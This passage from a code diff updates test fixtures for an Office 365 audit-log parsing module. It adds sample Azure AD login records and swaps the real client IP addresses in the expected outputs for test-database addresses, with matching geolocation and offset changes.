+{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"}
+{"CreationTime":"2021-02-05T09:05:59","Id":"eed8f929-567c-45bf-94ad-76ccf0f26300","Operation":"UserLoginFailed","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"00000002-0000-0000-c000-000000000000","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Success"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"UserAuthenticationMethod","Value":"1"},{"Name":"RequestType","Value":"Login:login"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"9b4acea8-44ad-49f1-a9c3-88c075e8ba85","IntraSystemId":"eed8f929-567c-45bf-94ad-76ccf0f26300","SupportTicketId":"","Target":[{"ID":"00000002-0000-0000-c000-000000000000","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"4345a7b9-9a63-4910-a426-35363201d503","ErrorNumber":"50072","LogonError":"UserStrongAuthEnrollmentRequiredInterrupt"}
+{"CreationTime":"2021-02-05T09:06:07","Id":"550ed0e2-27da-4cbc-9fb8-46add4018800","Operation":"UserLoggedIn","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":15,"ResultStatus":"Success","UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"89.160.20.112","ObjectId":"Unknown","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"ResultStatusDetail","Value":"Redirect"},{"Name":"UserAgent","Value":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko\/20100101 Firefox\/85.0"},{"Name":"RequestType","Value":"OAuth2:Authorize"}],"ModifiedProperties":[],"Actor":[{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":0},{"ID":"root@testsiem4.onmicrosoft.com","Type":5}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"89.160.20.112","InterSystemsId":"df4c6d6c-4551-4f2d-8766-03700dfccb47","IntraSystemId":"550ed0e2-27da-4cbc-9fb8-46add4018800","SupportTicketId":"","Target":[{"ID":"Unknown","Type":0}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ApplicationId":"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7","ErrorNumber":"0"}
diff --git a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json
index b0d29652926b..35b8735d1a02 100644
--- a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json
@@ -107,8 +107,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:13.000Z",
-        "client.address": "52.114.88.180",
-        "client.ip": "52.114.88.180",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -127,7 +127,7 @@
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
         "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
-        "o365.audit.ClientIP": "52.114.88.180",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "fc39a89f-5054-2000-9ced-83aa1cf560fd",
         "o365.audit.CreationTime": "2021-02-05T09:08:13",
         "o365.audit.DoNotDistributeEvent": true,
@@ -157,20 +157,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "52.114.88.180",
+        "related.ip": "81.2.69.143",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5132,
-        "source.geo.location.lon": -0.0961,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "52.114.88.180",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -184,8 +182,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:12.000Z",
-        "client.address": "52.114.88.180",
-        "client.ip": "52.114.88.180",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FolderCreated",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -203,11 +201,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 2192,
+        "log.offset": 2190,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
         "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
-        "o365.audit.ClientIP": "52.114.88.180",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "fc39a89f-b01b-2000-9ced-879789d2d8e5",
         "o365.audit.CreationTime": "2021-02-05T09:08:12",
         "o365.audit.EventSource": "SharePoint",
@@ -232,20 +230,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "52.114.88.180",
+        "related.ip": "81.2.69.143",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5132,
-        "source.geo.location.lon": -0.0961,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "52.114.88.180",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -277,7 +273,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 3234,
+        "log.offset": 3230,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:57",
         "o365.audit.EventData": "<Group>Site Members</Group>",
@@ -329,7 +325,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 4046,
+        "log.offset": 4042,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<Group>Site Owners</Group>",
@@ -381,7 +377,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 4838,
+        "log.offset": 4834,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<Group>Site Owners</Group>",
@@ -433,7 +429,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 5631,
+        "log.offset": 5627,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<Group>Site Members</Group>",
@@ -485,7 +481,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 6426,
+        "log.offset": 6422,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<Group>Site Owners</Group>",
@@ -523,8 +519,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:07:56.000Z",
-        "client.address": "20.190.143.50",
-        "client.ip": "20.190.143.50",
+        "client.address": "81.2.69.193",
+        "client.ip": "81.2.69.193",
         "event.action": "SiteCollectionCreated",
         "event.category": "web",
         "event.code": "SharePoint",
@@ -539,11 +535,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 7218,
+        "log.offset": 7214,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "Microsoft Graph",
         "o365.audit.ApplicationId": "00000006-0000-0ff1-ce00-000000000000",
-        "o365.audit.ClientIP": "20.190.143.50",
+        "o365.audit.ClientIP": "81.2.69.193",
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<SiteCreationSource>O365AdminCenter</SiteCreationSource><TenantSettings.ShowCreateSiteCommand>True</TenantSettings.ShowCreateSiteCommand><TenantSettings.UseCustomSiteCreationForm>False</TenantSettings.UseCustomSiteCreationForm>",
@@ -562,20 +558,18 @@
         "o365.audit.Version": 1,
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "20.190.143.50",
+        "related.ip": "81.2.69.193",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5132,
-        "source.geo.location.lon": -0.0961,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "20.190.143.50",
+        "source.ip": "81.2.69.193",
         "tags": [
             "forwarded"
         ],
@@ -603,7 +597,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 8147,
+        "log.offset": 8141,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:56",
         "o365.audit.EventData": "<Group>Site Owners</Group>",
@@ -655,7 +649,7 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 8940,
+        "log.offset": 8934,
         "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78",
         "o365.audit.CreationTime": "2021-02-05T09:07:55",
         "o365.audit.EventData": "<Group>Site Owners</Group>",
@@ -693,8 +687,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:14.000Z",
-        "client.address": "52.114.88.180",
-        "client.ip": "52.114.88.180",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "ListUpdated",
         "event.category": "web",
         "event.code": "SharePointListOperation",
@@ -709,11 +703,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 9732,
+        "log.offset": 9726,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
         "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
-        "o365.audit.ClientIP": "52.114.88.180",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d",
         "o365.audit.CreationTime": "2021-02-05T09:08:14",
         "o365.audit.DoNotDistributeEvent": true,
@@ -743,20 +737,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "52.114.88.180",
+        "related.ip": "81.2.69.143",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5132,
-        "source.geo.location.lon": -0.0961,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "52.114.88.180",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -770,8 +762,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:14.000Z",
-        "client.address": "52.114.88.180",
-        "client.ip": "52.114.88.180",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "ListCreated",
         "event.category": "web",
         "event.code": "SharePointListOperation",
@@ -786,11 +778,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "testsiem4.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 10806,
+        "log.offset": 10798,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "Microsoft Teams Services",
         "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe",
-        "o365.audit.ClientIP": "52.114.88.180",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d",
         "o365.audit.CreationTime": "2021-02-05T09:08:14",
         "o365.audit.EventSource": "SharePoint",
@@ -813,20 +805,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "52.114.88.180",
+        "related.ip": "81.2.69.143",
         "related.user": "root",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5132,
-        "source.geo.location.lon": -0.0961,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "52.114.88.180",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -840,8 +830,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -856,11 +846,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 11743,
+        "log.offset": 11733,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -890,20 +880,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -917,8 +905,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -933,11 +921,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 12834,
+        "log.offset": 12823,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -967,20 +955,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -994,8 +980,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -1010,11 +996,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 13925,
+        "log.offset": 13913,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -1044,20 +1030,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1071,8 +1055,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -1087,11 +1071,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 15016,
+        "log.offset": 15003,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -1121,20 +1105,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1148,8 +1130,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -1164,11 +1146,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 16107,
+        "log.offset": 16093,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -1198,20 +1180,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "tags": [
             "forwarded"
         ],
@@ -1225,8 +1205,8 @@
     },
     {
         "@timestamp": "2021-02-05T09:08:17.000Z",
-        "client.address": "51.141.50.227",
-        "client.ip": "51.141.50.227",
+        "client.address": "175.16.199.1",
+        "client.ip": "175.16.199.1",
         "event.action": "ListColumnUpdated",
         "event.category": "web",
         "event.code": "SharePointFieldOperation",
@@ -1241,11 +1221,11 @@
         "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
         "host.name": "sharepoint",
         "input.type": "log",
-        "log.offset": 17198,
+        "log.offset": 17183,
         "network.type": "ipv4",
         "o365.audit.ApplicationDisplayName": "OneNote",
         "o365.audit.ApplicationId": "2d4d3d8e-2be3-4bef-9f87-7875a61c29de",
-        "o365.audit.ClientIP": "51.141.50.227",
+        "o365.audit.ClientIP": "175.16.199.1",
         "o365.audit.CorrelationId": "fd39a89f-9050-2000-7abb-ce79fabfa6c0",
         "o365.audit.CreationTime": "2021-02-05T09:08:17",
         "o365.audit.DoNotDistributeEvent": true,
@@ -1275,20 +1255,18 @@
         "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840",
         "o365.audit.Workload": "SharePoint",
         "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
-        "related.ip": "51.141.50.227",
+        "related.ip": "175.16.199.1",
         "related.user": "app",
         "service.type": "o365",
-        "source.as.number": 8075,
-        "source.as.organization.name": "Microsoft Corporation",
-        "source.geo.city_name": "Cardiff",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4975,
-        "source.geo.location.lon": -3.2004,
-        "source.geo.region_iso_code": "GB-CRF",
-        "source.geo.region_name": "Cardiff",
-        "source.ip": "51.141.50.227",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
